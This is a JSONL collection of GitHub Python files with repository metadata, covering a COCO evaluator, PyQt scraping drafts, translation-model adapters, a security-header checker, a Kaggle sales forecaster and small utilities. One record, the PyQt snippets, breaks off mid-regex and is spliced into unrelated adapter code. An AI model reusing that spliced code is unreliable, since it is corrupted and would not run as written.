+{"seq_id": "5230173141", "text": "import magic\n\nfrom infrastructure.config.config import LANGUAGE_EXTENSIONS\n\n\nasync def identify_language(file_path: str, languages: set):\n # Use python-magic to determine the file type and\n # add to languages set\n mime: magic.Magic = magic.Magic()\n file_type: str = mime.from_file(file_path)\n for language in LANGUAGE_EXTENSIONS:\n if language in file_type:\n languages.add(language)\n", "repo_name": "Lehsqa/eon_telegram_bot", "sub_path": "project/infrastructure/files/identify_language.py", "file_name": "identify_language.py", "file_ext": "py", "file_size_in_byte": 415, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "magic.Magic", "line_number": 9, "usage_type": "attribute"}, {"api_name": "infrastructure.config.config.LANGUAGE_EXTENSIONS", "line_number": 11, "usage_type": "name"}]}
+{"seq_id": "72576167447", "text": "\"\"\"Calculate Mean Average Precision on the ground truth and predictions in the COCO format.\"\"\"\n\nimport argparse\n\nfrom pycocotools.coco import COCO\nfrom pycocotools.cocoeval import COCOeval\n\n\ndef print_results(coco_eval):\n coco_eval.evaluate()\n coco_eval.accumulate()\n coco_eval.summarize()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n arg = parser.add_argument\n arg(\"-p\", \"--pred_path\", type=str, help=\"Path to the ground truth json file.\", required=True)\n arg(\"-g\", \"--gt_path\", type=str, help=\"Path to the json file with predictions.\", required=True)\n\n args = parser.parse_args()\n\n coco = COCO(args.gt_path)\n\n pred_coco = coco.loadRes(args.pred_path)\n\n categories = coco.cats\n\n print(\"-------------------------------------------------------------------------------\")\n print(\"CATEGORIES:\")\n print(categories)\n\n print(\"-------------------------------------------------------------------------------\")\n\n coco_eval = COCOeval(cocoGt=coco, cocoDt=pred_coco, iouType=\"bbox\")\n\n print(\"ALL CLASSES :\")\n\n print_results(coco_eval)\n\n for value in categories.values():\n category_id = value[\"id\"]\n class_name = value[\"name\"]\n print(\"-------------------------------------------------------------------------------\")\n print(\"CLASS_NAME = \", class_name)\n\n coco_eval.params.catIds = category_id\n print_results(coco_eval)\n", "repo_name": "ternaus/iglovikov_helper_functions", "sub_path": "iglovikov_helper_functions/metrics/coco_eval.py", "file_name": "coco_eval.py", "file_ext": "py", "file_size_in_byte": 1426, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 59, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "pycocotools.coco.COCO", "line_number": 23, "usage_type": "call"}, {"api_name": "pycocotools.cocoeval.COCOeval", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "28658249321", "text": "# coding: utf-8 \n\"\"\"\nimport sys\nfrom PyQt5.QtCore import QUrl\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtWebEngineWidgets import QWebEnginePage, QWebEngineView\n\nclass Render(QWebEngineView):\n def __init__(self, url):\n self.app = QApplication(sys.argv)\n QWebEngineView.__init__(self)\n self.loadFinished.connect(self._loadFinished)\n self.load(QUrl(url))\n self.app.exec_()\n\n def _loadFinished(self, result):\n # This is an async call, you need to wait for this\n # to be called before closing the app\n self.page().toHtml(self.callable)\n\n def callable(self, data):\n self.html = data\n # Data has been stored, it's safe to quit the app\n self.app.quit()\n\n\n\nimport lxml.html\n\n#定义一个网页地址\nurl = 'https://www.baidu.com'\n\nr = Render(url)\nresult = r.html\ntree = lxml.html.fromstring(result)\n\n\"\"\"\n\n\n\n\n\"\"\"\nimport sys\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\ndef render(source_html):\n\n class Render(QWebEngineView):\n def __init__(self, html):\n self.html = None\n self.app = QApplication(sys.argv)\n QWebEngineView.__init__(self)\n self.loadFinished.connect(self._loadFinished)\n self.setHtml(html)\n self.app.exec_()\n\n def _loadFinished(self, result):\n # what's going on here? how can I get the HTML from toHtml?\n self.page().toHtml(self.callable)\n self.app.quit()\n\n def callable(self, data):\n self.html = data\n\n return Render(source_html).html\nprint(render(\"http://www.widlabs.com\"))\n\"\"\"\n\n\n\n\n\"\"\"\nimport sys\nfrom PyQt5.QtCore import QUrl\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtWebEngineWidgets import QWebEnginePage, QWebEngineView\napp = QApplication(sys.argv)\nbrowser = QWebEngineView()\nbrowser.load(QUrl(\"http://www.widlabs.com/\"))\n\nbrowser.page().toHtml(this._callable)\n\nbrowser.show()\napp.exec_()\n\"\"\"\n\n\n\n\n\"\"\" \nimport sys \nfrom PyQt5.QtCore import * \nfrom PyQt5.QtWidgets import * \nfrom PyQt5.QtGui import * \nfrom PyQt5.QtWebEngineWidgets import * \n \nclass MainWindow(QMainWindow): \n def __init__(self, *args, **kwargs): \n super().__init__(*args, **kwargs) \n self.setWindowTitle(\"client\") \n self.setWindowIcon(QIcon('icons/icon.png')) \n self.resize(900, 600) \n self.show() \n \n self.browser = QWebEngineView() \n url = 'https://www.baidu.com' \n self.browser.load(QUrl(url)) \n self.setCentralWidget(self.browser) \n \nif __name__=='__main__': \n app = QApplication(sys.argv) \n window = MainWindow() \n window.show() \n sys.exit(app.exec_()) \n\"\"\"\n\n\n\n\n\n\"\"\"\nfrom PyQt5.QtCore import QUrl\nfrom PyQt5.QtWidgets import QApplication\n#from PyQt5.QtWebKitWidgets import QWebView\nfrom PyQt5.QtCore import QEventLoop\n#import lxml.html\nfrom bs4 import BeautifulSoup\nfrom PyQt5.QtWebEngineWidgets import QWebEnginePage, QWebEngineView\nurl = 'https://zhuanlan.zhihu.com/p/27363298'\n\napp = QApplication([])\nwebview = QWebEngineView()\nloop = QEventLoop()\n\nwebview.loadFinished.connect(loop.quit)\nwebview.load(QUrl(url))\nloop.exec_()\nhtml = webview.page().mainFrame().toHtml()\n#tree = lxml.html.fromstring(html)\n#fixed_html = lxml.html.tostring(tree, pretty_print=True)\nsoup = BeautifulSoup(html, 'html.parser')\nfixed_html = soup.prettify()\ntitle = soup.find(class_=\"PostIndex-title av-paddingSide av-titleFont\")\n#print(fixed_html)\n\"\"\"\n\n\n\n\n\"\"\"\nimport sys,re\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtWebKit import *\n \n \np = re.compile(r' 0:\n if self.training:\n 
adapter_lives = (torch.rand(1)[0].item() >= self.death_rate)\n if not adapter_lives:\n return input # if rand < death rate, direclty give out input (adapter is dead)\n\n unique_lang_id = torch.unique(lang)\n assert len(unique_lang_id) == 1\n # Danni: This line was lang.numel() == 1. Had to change this after giving language tag to tokens:\n\n index = unique_lang_id.item() # was lang.item()\n adapter = self.all_modules[index]\n\n # normalize -> transform -> residual\n return input + adapter(input)\n\n\n", "repo_name": "lenacabrera/gb_mnmt", "sub_path": "onmt/modules/multilingual_factorized/multilingual_adapters.py", "file_name": "multilingual_adapters.py", "file_ext": "py", "file_size_in_byte": 2124, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "math.sqrt", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn.ModuleList", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.nn.LayerNorm", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "onmt.modules.linear.FeedForward", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.rand", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.unique", "line_number": 53, "usage_type": "call"}]}
+{"seq_id": "2188622329", "text": "from features.metadata_base import MetadataBase\nfrom features.website_manager import WebsiteData\nfrom lib.constants import STRICT_TRANSPORT_SECURITY, VALUES\n\n\nclass Security(MetadataBase):\n decision_threshold = 1\n\n expected_headers: dict = {\n \"cache-control\": {0: [\"no-cache\", \"no-store\"]},\n \"content-security-policy\": {},\n \"referrer-policy\": {},\n STRICT_TRANSPORT_SECURITY: {0: [\"max-age=\", \"includeSubDomains\"]},\n \"x-content-type-options\": {0: [\"nosniff\"]},\n \"x-frame-options\": {0: [\"deny\", \"same_origin\"]},\n \"x-xss-protection\": {\n 0: [\"1\"],\n 1: [\"mode=block\"],\n },\n }\n\n @staticmethod\n def _unify_text(text: str) -> str:\n return text.replace(\"_\", \"\").replace(\"-\", \"\").lower()\n\n def _start(self, website_data: WebsiteData) -> dict:\n values = []\n\n for tag, expected_value in self.expected_headers.items():\n if tag in website_data.headers:\n if len(expected_value) == 0:\n values.append(tag)\n else:\n\n header_value = self._extract_header_values(\n website_data.headers[tag]\n )\n\n expected_value = self._process_expected_values(\n expected_value\n )\n\n found_keys = self._number_of_expected_keys_in_header(\n expected_value, header_value\n )\n\n if (\n tag == STRICT_TRANSPORT_SECURITY\n and self._is_sts_mag_age_greater_than_zero(\n header_value\n )\n ):\n found_keys += 1\n\n if found_keys == len(expected_value.keys()):\n values.append(tag)\n\n return {VALUES: values}\n\n def _extract_header_values(self, header: list) -> list:\n header_value = [\n self._unify_text(value).replace(\",\", \";\").split(\";\")\n for value in header\n ]\n return [el for val in header_value for el in val]\n\n def _process_expected_values(self, expected_value: dict) -> dict:\n for idx, element in expected_value.items():\n expected_value.update(\n {int(idx): [self._unify_text(value) for value in element]}\n )\n return expected_value\n\n @staticmethod\n def _number_of_expected_keys_in_header(\n expected_value: dict, header_value: list\n ) -> int:\n found_values = sum(\n [\n 1\n for value in expected_value.values()\n for val in value\n if val in header_value\n ]\n )\n return found_values\n\n @staticmethod\n def _is_sts_mag_age_greater_than_zero(header_value: list) -> bool:\n greater_than_zero = False\n for el in header_value:\n if el.startswith(\"maxage=\") and int(el.split(\"=\")[-1]) > 0:\n greater_than_zero = True\n return greater_than_zero\n\n def _decide(self, website_data: WebsiteData) -> tuple[bool, float]:\n probability = len(website_data.values) / len(\n self.expected_headers.keys()\n )\n decision = probability >= self.decision_threshold\n return decision, probability\n", "repo_name": "codecentric/metadata_picker", "sub_path": "src/features/security.py", "file_name": "security.py", "file_ext": "py", "file_size_in_byte": 3379, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "features.metadata_base.MetadataBase", "line_number": 6, "usage_type": "name"}, {"api_name": "lib.constants.STRICT_TRANSPORT_SECURITY", "line_number": 13, "usage_type": "name"}, {"api_name": "features.website_manager.WebsiteData", "line_number": 26, "usage_type": "name"}, {"api_name": "lib.constants.STRICT_TRANSPORT_SECURITY", "line_number": 48, "usage_type": "name"}, {"api_name": "lib.constants.VALUES", "line_number": 58, "usage_type": "name"}, {"api_name": "features.website_manager.WebsiteData", "line_number": 96, "usage_type": "name"}]}
+{"seq_id": "70800511127", "text": "import re\nimport os\nimport time\nimport joblib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport typing as t\nimport numpy as np\nimport lightgbm as lgb\nimport category_encoders as ce\nfrom sklearn.preprocessing import LabelEncoder\nfrom datetime import datetime\nfrom itertools import product\n\nDATA_DIR = \"src/sample_data/Kaggle/predict_future_price\"\nSALES_TRAIN_PATH = f\"{DATA_DIR}/sales_train.csv\"\nITEMS_PATH = f\"{DATA_DIR}/items.csv\"\nITEM_CATEGORIES_PATH = f\"{DATA_DIR}/item_categories.csv\"\nPRED_PRICE_PATH = f\"{DATA_DIR}/pred_price.csv\"\nSHOPS_PATH = f\"{DATA_DIR}/shops.csv\"\nTEST_PATH = f\"{DATA_DIR}/test.csv\"\n\ndef name_correction(x):\n x = x.lower()\n x = x.partition('[')[0]\n x = x.partition('(')[0]\n x = re.sub('[^A-Za-z0-9А-Яа-я]+', ' ', x)\n x = x.replace(' ', ' ')\n x = x.strip()\n return x\n\ndef preprocessing_shops(shops):\n # shopsの前処理\n shops.loc[ shops.shop_name == 'Сергиев Посад ТЦ \"7Я\"',\"shop_name\" ] = 'СергиевПосад ТЦ \"7Я\"'\n shops[\"city\"] = shops.shop_name.str.split(\" \").map( lambda x: x[0] )\n shops[\"category\"] = shops.shop_name.str.split(\" \").map( lambda x: x[1] )\n shops.loc[shops.city == \"!Якутск\", \"city\"] = \"Якутск\"\n category = [] # 登場回数の少ないカテゴリは\"etc\"とする\n for cat in shops.category.unique():\n if len(shops[shops.category == cat]) > 4:\n category.append(cat)\n shops.category = shops.category.apply( lambda x: x if (x in category) else \"etc\" ) # 母数の多いカテゴリはそのまま、それ以外を「etc(その他)」としている。\n shops[\"category\"] = LabelEncoder().fit_transform(shops.category) # categoryとcityのカテゴリ変数をencording\n shops[\"city\"] = LabelEncoder().fit_transform(shops.city)\n shops = shops.drop(\"shop_name\", axis=1)\n return shops\n\ndef preprocessing_item_category(item_categories):\n # item_categoryの前処理\n item_categories[\"type_code\"] = item_categories.item_category_name.apply(lambda x: x.split()[0]).astype(str) # 文字列の\" \"で区切られている部分の先頭の文字列を取得する。\n item_categories.loc[(item_categories.type_code == \"Игровые\") | (item_categories.type_code == \"Аксессуары\"), \"category\"] = \"Игры\"\n category = [] # 登場回数の少ないカテゴリは\"etc\"とする\n for cat in item_categories.type_code.unique():\n if len(item_categories[item_categories.type_code == cat]) > 4:\n category.append(cat)\n item_categories.type_code = item_categories.type_code.apply(lambda x: x if (x in category) else \"etc\")\n item_categories[\"type_code\"] = LabelEncoder().fit_transform(item_categories.type_code)\n item_categories[\"split\"] = item_categories.item_category_name.apply(lambda x: x.split(\"-\"))\n item_categories[\"subtype\"] = item_categories.split.apply(lambda x: x[1].strip() if len(x) > 1 else x[0].strip())\n item_categories[\"subtype_code\"] = LabelEncoder().fit_transform(item_categories.subtype)\n item_categories = item_categories.loc[:, [\"item_category_id\", \"type_code\", \"subtype_code\"]]\n return item_categories\n\ndef preprocessing_items(items):\n # itemsの前処理\n items[\"name1\"], items[\"name2\"] = items.item_name.str.split(\"[\", 1).str\n items[\"name1\"], items[\"name3\"] = items.item_name.str.split(\"(\", 1).str\n items[\"name2\"] = items.name2.str.replace('[^A-Za-z0-9А-Яа-я]+', \" \").str.lower()\n items[\"name3\"] = items.name3.str.replace('[^A-Za-z0-9А-Яа-я]+', \" \").str.lower()\n items = items.fillna('0')\n items[\"item_name\"] = items[\"item_name\"].apply(lambda x: name_correction(x))\n items.name2 = items.name2.apply( lambda x: x[:-1] if x !=\"0\" else \"0\")\n items[\"type\"] = items.name2.apply(lambda x: x[0:8] if x.split(\" \")[0] 
== \"xbox\" else x.split(\" \")[0] )\n items.loc[(items.type == \"x360\") | (items.type == \"xbox360\") | (items.type == \"xbox 360\") ,\"type\"] = \"xbox 360\"\n items.loc[ items.type == \"\", \"type\"] = \"mac\"\n items.type = items.type.apply( lambda x: x.replace(\" \", \"\") )\n items.loc[ (items.type == 'pc' )| (items.type == 'pс') | (items.type == \"pc\"), \"type\" ] = \"pc\"\n items.loc[ items.type == 'рs3' , \"type\"] = \"ps3\"\n remove_cols = []\n for name, value in items[\"type\"].value_counts().items():\n if value < 40:\n remove_cols.append(name) \n else:\n pass\n items.name2 = items.name2.apply(lambda x: \"etc\" if (x in remove_cols) else x)\n items = items.drop([\"type\"], axis = 1)\n items.name2 = LabelEncoder().fit_transform(items.name2)\n items.name3 = LabelEncoder().fit_transform(items.name3)\n items.drop([\"item_name\", \"name1\"],axis = 1, inplace= True)\n return items\n\n\n\ndef preprocessing_train_test(train, test):\n train = train[train.item_price > 0].reset_index(drop = True)\n train.loc[train.item_cnt_day < 1, \"item_cnt_day\"] = 0\n\n train.loc[train.shop_id == 0, \"shop_id\"] = 57\n test.loc[test.shop_id == 0 , \"shop_id\"] = 57\n train.loc[train.shop_id == 1, \"shop_id\"] = 58\n test.loc[test.shop_id == 1 , \"shop_id\"] = 58\n train.loc[train.shop_id == 11, \"shop_id\"] = 10\n test.loc[test.shop_id == 11, \"shop_id\"] = 10\n train.loc[train.shop_id == 40, \"shop_id\"] = 39\n test.loc[test.shop_id == 40, \"shop_id\"] = 39\n train[\"revenue\"] = train[\"item_cnt_day\"] * train[\"item_price\"]\n test[\"date_block_num\"] = 34 # 0~33までを学習データとし用い、34(ひと月分)の売り上げを予測する\n test = test.apply(lambda x: x.astype(np.int16))\n\n return train, test\n\n\ndef gen_lag_feature(matrix, lags, cols):\n pre_cols = [\"shop_id\", \"item_id\"]\n for col in cols:\n _df = matrix.loc[:, [*pre_cols, col]]\n for lag in lags:\n matrix[f\"{col}_lag_{lag}\"] = _df.groupby(pre_cols)[col].shift(lag)\n return matrix\n\n\ndef get_model(train_dataset: t.Any, valid_dataset: t.Any) -> t.Any:\n params = {\n \"objective\": \"regression\",\n \"boosting_type\": \"gbdt\",\n 'metric' : {'rmse'},\n 'num_leaves' : 200,\n 'min_data_in_leaf': 1000,\n 'num_iterations' : 10000,\n 'learning_rate' : 0.1,\n 'feature_fraction' : 0.8,\n }\n model = lgb.train(\n params=params,\n train_set=train_dataset,\n valid_sets=valid_dataset,\n early_stopping_rounds=10,\n )\n return model\n\n\n\ndef main():\n train = pd.read_csv(SALES_TRAIN_PATH)\n items = pd.read_csv(ITEMS_PATH)\n item_categories = pd.read_csv(ITEM_CATEGORIES_PATH)\n pred_price = pd.read_csv(PRED_PRICE_PATH)\n shops = pd.read_csv(SHOPS_PATH)\n test = pd.read_csv(TEST_PATH)\n\n train, test = preprocessing_train_test(train, test)\n shops = preprocessing_shops(shops)\n item_categories = preprocessing_item_category(item_categories)\n items = preprocessing_items(items)\n\n matrix = []\n cols = [\"date_block_num\", \"shop_id\", \"item_id\"]\n for i in range(34): # date_block_num(1月分)が0~33まで存在する。\n sales = train[train[\"date_block_num\"] == i] # 1月毎の売り上げを抽出\n sales_matrix = np.array(list(product([i], sales.shop_id.unique(), sales.item_id.unique())), dtype = np.int16) # 月、item_id、shop_idの組み合わせ(直積)を算出\n matrix.append(sales_matrix)\n matrix = pd.DataFrame(np.vstack(matrix), columns=cols).sort_values(cols) # 月、item_id、shop_idの組み合わせをdataframeにしたもの\n matrix = matrix.apply(lambda x: x.astype(np.int16))\n\n group = train.groupby([\"date_block_num\", \"shop_id\", \"item_id\"]).agg({\"item_cnt_day\": [\"sum\"]}) # [\"date_block_num\", \"shop_id\", \"item_id\"]の組み合わせごとの総売り上げ数\n 
group.columns = [\"item_cnt_month\"]\n group = group.reset_index()\n merged_matrix = pd.merge(matrix, group, how=\"left\", on=cols)\n merged_matrix[\"item_cnt_month\"] = merged_matrix[\"item_cnt_month\"].fillna(0).clip(0, 20) # その月で売り上げのなかったitemは0で置換し、最小値を0、最大値を20として外れ値を除去\n\n submit_ids = test.loc[:, \"ID\"]\n merged_matrix = pd.concat([merged_matrix, test.drop(\"ID\", axis=1)], axis=0).fillna(0).reset_index(drop=True)\n\n # 与えられたデータフレームのマージ\n merged_items = pd.merge(\n items,\n item_categories,\n on=\"item_category_id\",\n how=\"left\"\n )\n merged_matrix = pd.merge(\n merged_matrix,\n merged_items,\n on=\"item_id\",\n how=\"left\"\n )\n merged_matrix = pd.merge(\n merged_matrix,\n shops,\n on=\"shop_id\",\n how=\"left\"\n )\n merged_matrix = merged_matrix.apply(lambda x: x.astype(np.int16))\n merged_matrix = gen_lag_feature(merged_matrix, [1,2,3], [\"item_cnt_month\"]) # 1,2,3か月前の\"item_cnt_month\"を特徴量に追加\n\n # 各月における全アイテムの売り上げ平均数を特徴量に追加\n group = merged_matrix.groupby(\"date_block_num\").agg({\"item_cnt_month\" : \"mean\"}) \n group.columns = [\"date_avg_item_cnt\"] \n group.reset_index(inplace = True) # col: date_block_num, date_avg_item_cnt とする\n merged_matrix = pd.merge(merged_matrix, group, how=\"left\", on=\"date_block_num\")\n merged_matrix.date_avg_item_cnt = merged_matrix[\"date_avg_item_cnt\"].astype(np.float16)\n merged_matrix = gen_lag_feature(merged_matrix, [1], [\"date_avg_item_cnt\"]) # 1か月前の\"date_avg_item_cnt\"を特徴量に追加\n\n # 各月における、アイテム毎の売り上げ平均数を特徴量に追加\n group = merged_matrix.groupby([\"date_block_num\", \"item_id\"]).agg({\"item_cnt_month\" : \"mean\"}) \n group.columns = [\"date_item_avg_item_cnt\"] \n group.reset_index(inplace = True) # col: date_block_num, item_id, date_item_avg_item_cnt とする\n merged_matrix = pd.merge(merged_matrix, group, how=\"left\", on=[\"date_block_num\", \"item_id\"])\n merged_matrix.date_avg_item_cnt = merged_matrix[\"date_item_avg_item_cnt\"].astype(np.float16)\n merged_matrix = gen_lag_feature(merged_matrix, [1,2,3], [\"date_item_avg_item_cnt\"])\n\n # 各月におけるアイテムごとの平均価格を特徴量として追加\n group = train.groupby([\"date_block_num\", \"item_id\"]).agg({\"item_price\": \"mean\"})\n group.columns = [\"date_item_avg_item_price\"]\n group.reset_index(inplace = True)\n merged_matrix = pd.merge(merged_matrix, group, how=\"left\", on=[\"date_block_num\", \"item_id\"])\n merged_matrix.date_item_avg_item_price = merged_matrix[\"date_item_avg_item_price\"].astype(np.float16)\n merged_matrix = gen_lag_feature(merged_matrix, [1,2,3], [\"date_item_avg_item_price\"])\n\n # 月と日付の特徴量も追加\n merged_matrix[\"month\"] = merged_matrix[\"date_block_num\"] % 12\n days = pd.Series([31,28,31,30,31,30,31,31,30,31,30,31])\n merged_matrix[\"days\"] = merged_matrix[\"month\"].map(days).astype(np.int16)\n\n dataset = merged_matrix[merged_matrix[\"date_block_num\"] > 3] # lag情報付与により3月分はNanになっている為除去\n\n # date_block_num が1~32 のものを学習に、33のものを評価用に、34のものを検証用に用いる\n train_x = dataset[dataset.date_block_num < 33].drop(['item_cnt_month'], axis=1).reset_index(drop=True)\n train_y = dataset[dataset.date_block_num < 33]['item_cnt_month'].reset_index(drop=True)\n valid_x = dataset[dataset.date_block_num == 33].drop(['item_cnt_month'], axis=1).reset_index(drop=True)\n valid_y = dataset[dataset.date_block_num == 33]['item_cnt_month'].reset_index(drop=True)\n test_x = dataset[dataset.date_block_num == 34].drop(['item_cnt_month'], axis=1).reset_index(drop=True)\n\n train_dataset = lgb.Dataset(train_x, train_y)\n valid_dataset = lgb.Dataset(valid_x, valid_y, reference=train_dataset)\n\n if not 
os.path.isfile(f\"{DATA_DIR}/lgb_model.pkl\"):\n model = get_model(train_dataset, valid_dataset)\n joblib.dump(model, f\"{DATA_DIR}/lgb_model.pkl\")\n else:\n model = joblib.load(f\"{DATA_DIR}/lgb_model.pkl\")\n \n ids = test_x.index\n y_pred = model.predict(test_x).clip(0, 20) # test_x に対して予測し、予測値の範囲を(0,20)に設定\n print(y_pred)\n submission = pd.DataFrame(\n {\n \"ID\": range(len(test_x)),\n \"item_cnt_month\": y_pred\n }\n )\n print(submission)\n submission.to_csv(f\"{DATA_DIR}/submission_1.csv\", index=False)\n\n\n\nif __name__ == \"__main__\":\n # 2015年11月の売り上げを予測する。\n main()", "repo_name": "ueda-hiroyuki/machine_learning", "sub_path": "app/src/python_file/kaggle/predict_future_price/predict_future_price.py", "file_name": "predict_future_price.py", "file_ext": "py", "file_size_in_byte": 12396, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "re.sub", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 57, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 60, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 108, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 122, "usage_type": "attribute"}, {"api_name": "lightgbm.train", "line_number": 133, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 144, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 145, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 146, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 147, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 148, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 160, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 160, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 168, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 172, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 175, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 181, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 193, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.float16", "line_number": 201, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.float16", "line_number": 209, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.float16", "line_number": 217, "usage_type": 
"attribute"}, {"api_name": "pandas.Series", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.int16", "line_number": 223, "usage_type": "attribute"}, {"api_name": "lightgbm.Dataset", "line_number": 234, "usage_type": "call"}, {"api_name": "lightgbm.Dataset", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 237, "usage_type": "call"}, {"api_name": "os.path", "line_number": 237, "usage_type": "attribute"}, {"api_name": "joblib.dump", "line_number": 239, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 241, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 246, "usage_type": "call"}]}
+{"seq_id": "33056173192", "text": "from os.path import getsize as path_getsize\nfrom zlib import compress as zlib_compress\nfrom simplejson import loads as json_loads\n\n__version__ = '1.0.0'\n\ndef analyse_json(filename):\n \"\"\"Utility to return the ratio of key size, punctuation size, and leaf value size.\"\"\"\n\n unique_keys = { }\n\n def __get_size(j):\n \"\"\"Recurse to generate size.\"\"\"\n (keys, punctuation, key_count) = (0, 0, 0)\n if isinstance(j, list):\n punctuation += 1 # [\n punctuation += (len(j) - 1) # ,\n for v in j:\n sub_k, sub_p, sub_count = __get_size(v)\n keys += sub_k\n punctuation += sub_p\n key_count += sub_count\n punctuation += 1 # ]\n elif isinstance(j, dict):\n punctuation += 1 # {\n if len(j.keys()) > 1:\n punctuation += (len(j.keys()) - 1) # ,\n for k, v in j.iteritems():\n if k not in unique_keys:\n unique_keys[k] = True\n key_count += 1\n punctuation += 1 # \"\n keys += len(k)\n punctuation += 1 # \"\n punctuation += 1 # :\n sub_k, sub_p, sub_count = __get_size(v)\n keys += sub_k\n punctuation += sub_p\n key_count += sub_count\n punctuation += 1 # }\n elif isinstance(j, (str, unicode)):\n punctuation += 1 # \"\n punctuation += 1 # \"\n return (keys, punctuation, key_count)\n\n total_size = path_getsize(filename)\n with open(filename, 'r') as f:\n data = f.read()\n j = json_loads(data)\n\n (keys, punctuation, key_count) = __get_size(j)\n values = total_size - (keys + punctuation)\n unique_count = len(unique_keys.keys())\n compressed_size = len(zlib_compress(data, 6))\n\n return (keys, punctuation, values, key_count, unique_count, total_size, compressed_size)\n", "repo_name": "turbulenz/turbulenz_tools", "sub_path": "turbulenz_tools/utils/json_stats.py", "file_name": "json_stats.py", "file_ext": "py", "file_size_in_byte": 1975, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 61, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.getsize", "line_number": 46, "usage_type": "call"}, {"api_name": "simplejson.loads", "line_number": 49, "usage_type": "call"}, {"api_name": "zlib.compress", "line_number": 54, "usage_type": "call"}]}
+{"seq_id": "18520061561", "text": "import time\nfrom datetime import datetime\nfrom functools import wraps\n\nfrom bitarray import bitarray\nfrom pybloom_live import BloomFilter\nimport warnings\n\nimport pandas as pd\nimport ast\nimport dask.dataframe as dd\nfrom dask import delayed\n\nfrom dask.tests.test_system import psutil\nfrom dateutil.relativedelta import relativedelta\n\n\nwarnings.filterwarnings(\"ignore\", category=Warning)\n\n# Function to calculate the optimal number of partitions\ndef calculate_partitions():\n # Get the available system resources\n cpu_cores = psutil.cpu_count(logical=False)\n memory = psutil.virtual_memory().total\n\n # Get the size of your dataset (replace with your actual dataset size)\n dataset_size = 1000000 # Example dataset size\n\n # Calculate the desired partition size based on system resources\n partition_size = 100000 # Example desired partition size\n\n # Calculate the optimal number of partitions\n num_partitions = min(cpu_cores, max(1, dataset_size // partition_size))\n\n return num_partitions\n\n\ndef udf_reformat_to_iso(string: str):\n splits = string.replace(' ', '').split(',')\n\n if len(splits) < 6:\n splits += ['00' for _ in range(0, 6 - len(splits))]\n\n year, month, day, hour, minute, second = splits[0], splits[1], splits[2], splits[3], splits[4], splits[5]\n\n if len(month) != 2:\n month = '0' + month\n\n if len(day) != 2:\n day = '0' + day\n\n if len(hour) != 2:\n hour = '0' + hour\n\n if len(minute) != 2:\n minute = '0' + minute\n\n if len(second) != 2:\n second = '0' + second\n\n return 